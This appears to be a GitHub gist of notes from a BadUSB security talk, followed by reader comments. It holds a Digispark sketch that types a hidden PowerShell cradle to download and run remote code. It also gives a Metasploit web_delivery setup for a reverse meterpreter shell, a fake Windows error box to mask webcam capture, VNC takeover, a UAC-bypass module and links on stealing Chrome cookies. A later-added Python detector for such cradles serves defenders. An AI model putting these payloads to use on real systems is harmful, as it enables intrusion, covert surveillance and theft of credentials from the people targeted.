# Notes from the Null talk on BadUSB
## Bad USB code
```cpp
#include "DigiKeyboard.h"
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished

void setup() {
  pinMode(WorkingPin, OUTPUT); // Needed so digitalWrite() drives the LED instead of only toggling the pull-up
}

void loop() {
  digitalWrite(WorkingPin, HIGH);
  DigiKeyboard.sendKeyStroke(0); // Empty keystroke; the DigiKeyboard examples use it so some hosts don't drop the first real key
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); // Win+R opens the Run dialog
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  digitalWrite(WorkingPin, LOW);
  for (;;) {
    /* Stops the Digispark from running the script again */
  }
}
```
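A defender's counterpart to the sketch above, added here and not part of the original notes: the cradle it types shows up verbatim in process-creation telemetry, and this Python scores a command line by the indicators that cradle carries (no profile, hidden window, IEX, WebClient/DownloadString, proxy-credential reuse). The event dict layout, the weights and the threshold are assumptions for this example.

```python
"""Score PowerShell command lines from process-creation events (Security 4688 or
Sysmon Event ID 1) for the download-cradle indicators the sketch above types."""
import re

# (name, pattern, weight); weights and threshold are assumptions for this example.
INDICATORS = [
    ("no_profile",        re.compile(r"-nop(rofile)?\b", re.I), 1),
    ("hidden_window",     re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 2),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I), 3),
    ("web_client",        re.compile(r"net\.webclient|downloadstring", re.I), 3),
    ("proxy_aware",       re.compile(r"GetSystemWebProxy|DefaultCredentials", re.I), 2),
    ("encoded_command",   re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
]
ALERT_THRESHOLD = 5  # hidden window + IEX, or a download primitive + IEX, is enough

def score_cmdline(cmdline):
    """Return (score, matched indicator names) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits

def triage(events, threshold=ALERT_THRESHOLD):
    """Alert on PowerShell launches whose command line scores >= threshold.
    Events are dicts with 'id', 'image', 'parent' and 'cmdline' keys (an assumption)."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        score, hits = score_cmdline(ev["cmdline"])
        if score >= threshold:
            alerts.append({"id": ev["id"], "parent": ev["parent"], "score": score, "hits": hits})
    return alerts

# Constructed sample events, not real telemetry. Event 2 is the cradle from the
# sketch above; its parent is explorer.exe because the Run dialog launched it.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -nop -w hidden -c $t=new-object net.webclient;"
                "$t.proxy=[Net.WebRequest]::GetSystemWebProxy();"
                "$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
                "IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');"},
    {"id": 3, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c echo IEX"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The parent process is carried into the alert because a keystroke-injected launch arrives via the Run dialog, so explorer.exe as parent of a hidden, profile-less PowerShell is the context an analyst will want to see first.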
## Metasploit resource file used in the demonstration (msf-web-delivery.rc)
```
use exploit/multi/script/web_delivery
set Target 2
set LHOST <YOUR_LOCAL_IP_HERE>
set LPORT 6680
set payload windows/x64/meterpreter/reverse_tcp
# This step is necessary, otherwise the session just dies
# (kept on its own line: msfconsole's `set` takes the rest of the line as the value, so a trailing comment would become part of it)
set AutoRunScript post/windows/manage/migrate
exploit -j
```
## For popping up an innocuous message box before starting to capture webcam snaps
Reference: DEFCON 20, Weaponizing the Windows API with Metasploit: https://youtu.be/bdUT20fwwfI?t=1527
```ruby
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is MB_ICONSTOP, taken from here: https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox
```
If the above doesn't work, you might need to prefix the command with `client` (as shown in the video), like this:
```ruby
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10)
```
## For VNC
After getting a meterpreter session:
```
run vnc
```
Then connect with a VNC client on the "local machine".
## For privilege escalation (https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/)
```
use exploit/windows/local/bypassuac_comhijack
set payload windows/x64/meterpreter/reverse_tcp
set session 2
set LHOST <YOUR_LOCAL_IP_HERE>
exploit
```
## For extracting Google Chrome cookies (extracting passwords would still require you to enter the OTP if 2FA is enabled)
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password
You can follow the discussion here (quite interesting, if you ask me): https://news.ycombinator.com/item?id=18376323
There's a Metasploit module available too: https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md
## State-of-the-art things
Bad USB cables: https://mg.lol/blog/badusb-cables/
O.M.G. cables: https://mg.lol/blog/omg-cable/
## Other useful things
DigiSpark Scripts repo: https://github.com/CedArctic/DigiSpark-Scripts
#shamelessSelfPromotion ahead :p
You can read my other blogs here: https://lud1161.github.io/ and here: https://lud1161.wordpress.com/
@vishwaskheriwal commented Jun 2, 2019

Sir, can you provide a video on this topic?

@LuD1161 (Owner, Author) commented Jun 2, 2019

Hello @vishwaskheriwal, sorry to break it to you, but the talk wasn't recorded and I am not getting enough time to make a tutorial for the same and put it up online.
Feel free to join the talk, if and when it happens next.

@LuD1161 (Owner, Author) commented Aug 28, 2020

Hello @vishwaskheriwal,
this talk is happening again tomorrow, i.e. 29th Aug: https://www.meetup.com/OWASP-Bangalore-Chapter/events/272556608/
